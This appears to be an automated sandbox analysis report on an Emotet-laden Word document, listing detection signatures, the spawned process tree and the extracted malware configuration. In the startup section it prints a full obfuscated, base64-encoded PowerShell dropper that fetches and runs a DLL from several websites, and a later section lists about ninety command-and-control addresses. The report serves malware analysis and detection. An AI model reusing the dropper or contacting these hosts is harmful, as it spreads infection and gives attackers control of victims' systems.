Loading ...

Play interactive tourEdit tour

Analysis Report ARCH_25_012021.doc

Overview

General Information

Sample Name:ARCH_25_012021.doc
Analysis ID:344852
MD5:baedc37e68b58765fa52c73d0fd2c2d5
SHA1:2131d1319b5de532638d34f1e3bf68337b6099bf
SHA256:94485b3ce47d4a2df6dba8e888ca7a360763f7edd5a0448552d1d06b6e4f4baa

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
C2 URLs / IPs found in malware configuration
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2408 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 2516 cmdline: cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3ACcAKQArACgAJwB1ACAAZAAnACsAJwBiACcAKQArACgAJwAgAG4AJwArACcAZAA6AC8AJwArACcALwAnACkAKwAoACcAbAAnACsAJwBlAG8AJwApACsAKAAnAHAAYQByACcAKwAnAGQAYwAnACkAKwAoACcAcgBhAG4AJwArACcAZQBzACcAKQArACgAJwAuAGMAbwAnACsAJwBtAC8AJwArACcAegB5AG4AcQAnACkAKwAnAC0AJwArACcAbAAnACsAKAAnAGkAJwArACcAbgB1ACcAKwAnAHgAJwArACcALQB5AGEAYQB5ACcAKQArACcAZgAvACcAKwAoACcAdwAnACsAJwAvACEAbgAnACkAKwAnAHMAIAAnACsAKAAnAHcAdQAgACcAKwAnAGQAYgAnACsAJwAgACcAKQArACcAbgAnACsAJwBkACcAKwAnADoAJwArACcALwAnACsAKAAnAC8AbQBtAHIAaQBuAGMAJwArACcAcwAuACcAKQArACgAJwBjAG8AJwArACcAbQAnACsAJwAvAGUAdABlAHIAbgBhAGwALQAnACkAKwAoACcAZAAnACsAJwB1AGUAbAAnACkAKwAoACcAaQAnACsAJwBzAHQALQAnACkAKwAoACcAOQBjAHUAJwArACcAcQB2AC8AagAnACkAKwAoACcAeAAnACsAJwBHAFEAagAvACEAJwArACcAbgAnACkAKwAoACcAcwAnACsAJwAgAHcAJwApACsAKAAnAHUAIABkACcAKwAnAGIAIABuAGQAJwArACcAOgAvACcAKQArACgAJwAvADMAJwArACcAbQB1ACcAKwAnAHMAawAnACkAKwAnAGUAdAAnACsAKAAnAGUAZQByACcAKwAnAHMAZQBuAHQALgBuAGUAJwArACcAdAAvACcAKQArACgAJwB3ACcAKwAnAHAALQBpAG4AJwArACcAYwBsAHUAZABlAHMALwBUAFUAJwArACcAZwBEAC8AIQBuACcAKwAnAHMAIAAnACkAKwAnAHcAdQAnACsAJwAgACcAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AZAAnACsAJwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAcwAnACsAJwBrAGkAbABtAHUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB3ACcAKwAnAHAALQBhACcAKQArACcAZAAnACsAKAAnAG0AaQBuAC8AJwArACcAaAAnACsAJwBRACcAKQArACgAJwBWAGwAQgAnACsAJwA4AGIALwAnACkAKQAuACIAcgBgAGUAUABsAEEAYABjAEUAIgAoACgAKAAnAG4AcwAnACsAJwAgACcAKQArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAnAG4AZAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAEsAMQBpAHUAeAB4AHAALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBwAGAAbABpAFQAIgAoACQARAA1ADQAUwAgACsAIAAkAEsAbwAzAGEAYwA2ADMAIAArACAAJABGADAAOABKACkAOwAkAE8AMQA2AFIAPQAoACcAWAA2ACcAKwAnADIAVgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEoAZAA1AHMAXwBoAGYAIABpAG4AIAAkAFQAYQAxAHkAcwBwADQAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAtAE8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAHMAeQBTAFQARQBNAC4ATgBlAFQALgB3AEUAQgBDAEwASQBFAG4AdAApAC4AIgBEAE8AdwBOAGAATABgAG8AQQBgAEQARgBJAGwARQAiACgAJABKAGQANQBzAF8AaABmACwAIAAkAFEAZgB4ADEAMAB4AGEAKQA7ACQATAAyADkARAA9ACgAJwBPADYAJwArACcANABIACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABRAGYAeAAxADAAeABhACkALgAiAEwAYABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAA0ADQANwAxADIAKQAgAHsAJgAoACcAcgB1AG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQAUQBmAHgAMQAwAHgAYQAsACgAJwBBACcAKwAoACcAbgB5AFMAdAAnACsAJwByACcAKQArACgAJwBpACcAKwAnAG4AZwAnACkAKQAuACIAVABvAHMAYABUAFIAaQBgAE4AZwAiACgAKQA7ACQAQgAyADcAQgA9ACgAKAAnAFcANAAnACsAJwAzACcAKQArACcAUwAnACkAOwBiAHIAZQBhAGsAOwAkAFoAOAAxAFYAPQAoACcASQA2ACcAKwAnADIAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIANQA4AEkAPQAoACcATwAzACcAKwAnADUASQAnACkA MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2296 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 1552 cmdline: powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3ACcAKQArACgAJwB1ACAAZAAnACsAJwBiACcAKQArACgAJwAgAG4AJwArACcAZAA6AC8AJwArACcALwAnACkAKwAoACcAbAAnACsAJwBlAG8AJwApACsAKAAnAHAAYQByACcAKwAnAGQAYwAnACkAKwAoACcAcgBhAG4AJwArACcAZQBzACcAKQArACgAJwAuAGMAbwAnACsAJwBtAC8AJwArACcAegB5AG4AcQAnACkAKwAnAC0AJwArACcAbAAnACsAKAAnAGkAJwArACcAbgB1ACcAKwAnAHgAJwArACcALQB5AGEAYQB5ACcAKQArACcAZgAvACcAKwAoACcAdwAnACsAJwAvACEAbgAnACkAKwAnAHMAIAAnACsAKAAnAHcAdQAgACcAKwAnAGQAYgAnACsAJwAgACcAKQArACcAbgAnACsAJwBkACcAKwAnADoAJwArACcALwAnACsAKAAnAC8AbQBtAHIAaQBuAGMAJwArACcAcwAuACcAKQArACgAJwBjAG8AJwArACcAbQAnACsAJwAvAGUAdABlAHIAbgBhAGwALQAnACkAKwAoACcAZAAnACsAJwB1AGUAbAAnACkAKwAoACcAaQAnACsAJwBzAHQALQAnACkAKwAoACcAOQBjAHUAJwArACcAcQB2AC8AagAnACkAKwAoACcAeAAnACsAJwBHAFEAagAvACEAJwArACcAbgAnACkAKwAoACcAcwAnACsAJwAgAHcAJwApACsAKAAnAHUAIABkACcAKwAnAGIAIABuAGQAJwArACcAOgAvACcAKQArACgAJwAvADMAJwArACcAbQB1ACcAKwAnAHMAawAnACkAKwAnAGUAdAAnACsAKAAnAGUAZQByACcAKwAnAHMAZQBuAHQALgBuAGUAJwArACcAdAAvACcAKQArACgAJwB3ACcAKwAnAHAALQBpAG4AJwArACcAYwBsAHUAZABlAHMALwBUAFUAJwArACcAZwBEAC8AIQBuACcAKwAnAHMAIAAnACkAKwAnAHcAdQAnACsAJwAgACcAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AZAAnACsAJwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAcwAnACsAJwBrAGkAbABtAHUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB3ACcAKwAnAHAALQBhACcAKQArACcAZAAnACsAKAAnAG0AaQBuAC8AJwArACcAaAAnACsAJwBRACcAKQArACgAJwBWAGwAQgAnACsAJwA4AGIALwAnACkAKQAuACIAcgBgAGUAUABsAEEAYABjAEUAIgAoACgAKAAnAG4AcwAnACsAJwAgACcAKQArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAnAG4AZAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAEsAMQBpAHUAeAB4AHAALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBwAGAAbABpAFQAIgAoACQARAA1ADQAUwAgACsAIAAkAEsAbwAzAGEAYwA2ADMAIAArACAAJABGADAAOABKACkAOwAkAE8AMQA2AFIAPQAoACcAWAA2ACcAKwAnADIAVgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEoAZAA1AHMAXwBoAGYAIABpAG4AIAAkAFQAYQAxAHkAcwBwADQAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAtAE8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAHMAeQBTAFQARQBNAC4ATgBlAFQALgB3AEUAQgBDAEwASQBFAG4AdAApAC4AIgBEAE8AdwBOAGAATABgAG8AQQBgAEQARgBJAGwARQAiACgAJABKAGQANQBzAF8AaABmACwAIAAkAFEAZgB4ADEAMAB4AGEAKQA7ACQATAAyADkARAA9ACgAJwBPADYAJwArACcANABIACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABRAGYAeAAxADAAeABhACkALgAiAEwAYABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAA0ADQANwAxADIAKQAgAHsAJgAoACcAcgB1AG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQAUQBmAHgAMQAwAHgAYQAsACgAJwBBACcAKwAoACcAbgB5AFMAdAAnACsAJwByACcAKQArACgAJwBpACcAKwAnAG4AZwAnACkAKQAuACIAVABvAHMAYABUAFIAaQBgAE4AZwAiACgAKQA7ACQAQgAyADcAQgA9ACgAKAAnAFcANAAnACsAJwAzACcAKQArACcAUwAnACkAOwBiAHIAZQBhAGsAOwAkAFoAOAAxAFYAPQAoACcASQA2ACcAKwAnADIAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIANQA4AEkAPQAoACcATwAzACcAKwAnADUASQAnACkA MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2304 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2748 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2728 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2812 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xsugi\zrfn.shd',FIxqgRZUp MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2876 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xsugi\zrfn.shd',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2908 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omuzql\aridm.cve',PiBVmMpskdW MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 912 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omuzql\aridm.cve',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 1616 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn',CPVO MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 2492 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["84.232.229.24:80", "51.255.203.164:8080", "217.160.169.110:8080", "185.183.16.47:80", "190.45.24.210:80", "187.162.248.237:80", "93.146.143.191:80", "185.94.252.27:443", "143.0.85.206:7080", "80.15.100.37:80", "85.105.239.184:443", "94.176.234.118:443", "62.84.75.50:80", "137.74.106.111:7080", "172.104.169.32:8080", "46.105.114.137:8080", "94.126.8.1:80", "78.206.229.130:80", "93.149.120.214:80", "192.175.111.212:7080", "80.249.176.206:80", "181.10.46.92:80", "190.24.243.186:80", "191.223.36.170:80", "177.23.7.151:80", "154.127.113.242:80", "51.255.165.160:8080", "87.106.46.107:8080", "85.214.26.7:8080", "190.247.139.101:80", "46.101.58.37:8080", "201.185.69.28:443", "46.43.2.95:8080", "82.208.146.142:7080", "110.39.160.38:443", "186.177.174.163:80", "51.38.124.206:80", "81.4.105.175:8080", "209.33.120.130:80", "172.245.248.239:8080", "45.16.226.117:443", "104.130.154.83:7080", "217.13.106.14:8080", "94.23.45.86:7080", "152.169.22.67:80", "12.162.84.2:8080", "201.48.121.65:443", "81.17.93.134:80", "81.215.230.173:443", "60.93.23.51:80", "122.201.23.45:443", "31.27.59.105:80", "105.209.235.113:8080", "197.232.36.108:80", "91.233.197.70:80", "87.106.253.248:8080", "138.97.60.141:7080", "152.170.79.100:80", "190.251.216.100:80", "177.85.167.10:80", "212.71.237.140:8080", "82.48.39.246:80", "213.52.74.198:80", "116.125.120.88:443", "81.214.253.80:443", "149.62.173.247:8080", "152.231.89.226:80", "206.189.232.2:8080", "181.30.61.163:443", "1.226.84.243:8080", "191.241.233.198:80", "109.101.137.162:8080", "110.39.162.2:443", "167.71.148.58:443", "5.196.35.138:7080", "190.64.88.186:443", "200.75.39.254:80", "138.97.60.140:8080", "170.81.48.2:80", "70.32.115.157:8080", "104.131.41.185:8080", "190.162.232.138:80", "188.135.15.49:80", "95.76.153.115:80", "188.225.32.231:7080", "12.163.208.58:80", "50.28.51.143:8080", "202.134.4.210:7080", "190.210.246.253:80", "149.202.72.142:7080", "138.197.99.250:8080", "68.183.190.199:8080", "211.215.18.93:8080"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.2340258197.0000000000740000.00000040.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    0000000E.00000002.2340368896.00000000007E0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      0000000D.00000002.2114550082.00000000007B0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000008.00000002.2102026803.00000000002D0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          0000000D.00000002.2114093455.0000000000710000.00000040.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 19 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            9.2.rundll32.exe.210000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              14.2.rundll32.exe.740000.1.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                12.2.rundll32.exe.1b0000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  11.2.rundll32.exe.750000.1.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    11.2.rundll32.exe.2a0000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      Click to see the 27 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicious Call by OrdinalShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1, CommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2748, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1, ProcessId: 2728
                      Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
